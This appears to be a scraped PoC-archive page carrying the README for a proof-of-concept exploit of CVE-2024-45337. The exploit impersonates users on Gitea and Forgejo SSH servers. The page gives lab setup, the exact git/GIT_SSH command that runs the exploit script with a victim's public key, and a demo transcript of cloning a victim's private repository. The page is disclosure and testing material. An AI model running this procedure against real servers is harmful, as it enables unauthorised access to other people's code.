来源

关联漏洞

描述

Proof of Concept for CVE-2024-45337 against Gitea and Forgejo

介绍

Proof of Concept exploit for CVE-2024-45337
===

This repository contains a proof of concept exploit for [CVE-2024-45337](https://nvd.nist.gov/vuln/detail/CVE-2024-45337).
It can be used to wrap `ssh` when interacting with an SSH server which is implemented using `golang.org/x/crypto` <= v0.30.0. while caching permissions in the `ServerConfig.PublicKeyCallback` callback in an unsafe manner.

Gitea <= 1.22.4 and Forgejo <= 7.0.11, 9.0.2 are vulnerable when hosted using the internal SSH server. You can impersonate any user as long as you know any of the public keys they have associated with their account. You need to have an account yourself which you use for ssh authentication.

## Run the PoC

1. Start a vulnerable forgejo or gitea instance. Gitea Docker images aren't vulnerable, so you'll have to run using a native binary.
```shell
docker compose -f docker-compose.forgejo.yml up -d
```
2. Install while changing the SSH port to 22 on http://localhost:3000
3. Register a `victim` user
    1.  Add the victim's public key to the account on http://localhost:3000/user/settings/keys
    2.  Create a private repository called `important_repo` and generate an initial commit with a README so you have something to clone
4. Register an `attacker` user
   1. Add the attacker's public key to the account on http://localhost:3000/user/settings/keys
5. Clone the repository using the attacker's account
   1. Set `GIT_ATTACK_PRIVKEY` to path to private key of valid account
   2. Set `GIT_ATTACK_PUBKEY` to path to known public key of other target account. We don't know the private key for that one.
   3. Set `GIT_SSH` to path to exploit script to tell `git` to use this instead of the native `ssh` command
```shell
GIT_ATTACK_PRIVKEY=./id_ed25519_attacker GIT_ATTACK_PUBKEY=./id_ed25519_victim.pub GIT_SSH_VARIANT=ssh GIT_SSH=./ssh_cve-2024-45337.py git clone ssh://git@localhost:222/victim/important_repo.git
```

## Demo

Use `.ssh/config` to specify keys during cloning
```
Host sshvictim
 Hostname localhost
 Port 222
 User git
 IdentityFile /path/to/id_ed25519_victim
 IdentitiesOnly yes
Host sshattacker
 Hostname localhost
 Port 222
 User git
 IdentityFile /path/to/id_ed25519_attacker
 IdentitiesOnly yes
```

Run against local Forgejo 7.0.11 container setup like above.
```
$ ssh-keygen -t ed25519 -f id_ed25519_victim
$ ssh-keygen -t ed25519 -f id_ed25519_attacker
$ git clone sshattacker:victim/important_repo.git
Cloning into 'important_repo'...
Forgejo: User: 2:attacker with Key: 2:attacker is not authorized to read victim/important_repo.
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
$ git clone sshvictim:victim/important_repo.git
Cloning into 'important_repo'...
remote: Enumerating objects: 3, done.
remote: Counting objects: 100% (3/3), done.
remote: Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (3/3), done.

# Delete private key of victim for demo purposes
$ rm -rf important_repo id_ed25519_victim
$ GIT_ATTACK_PRIVKEY=./id_ed25519_attacker GIT_ATTACK_PUBKEY=./id_ed25519_victim.pub GIT_SSH_VARIANT=ssh GIT_SSH=./ssh_cve-2024-45337.py git clone ssh://git@localhost:222/victim/important_repo.git
Cloning into 'important_repo'...
remote: Enumerating objects: 3, done.
remote: Counting objects: 100% (3/3), done.
remote: Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (3/3), done.
```

文件快照

 [4.0K]  /data/pocs/cea1d6618a64a2448634c85ddf812e928de34e30
├── [ 463]  docker-compose.forgejo.yml
├── [3.4K]  README.md
├── [  16]  requirements.txt
└── [6.1K]  ssh_cve-2024-45337.py

0 directories, 4 files

备注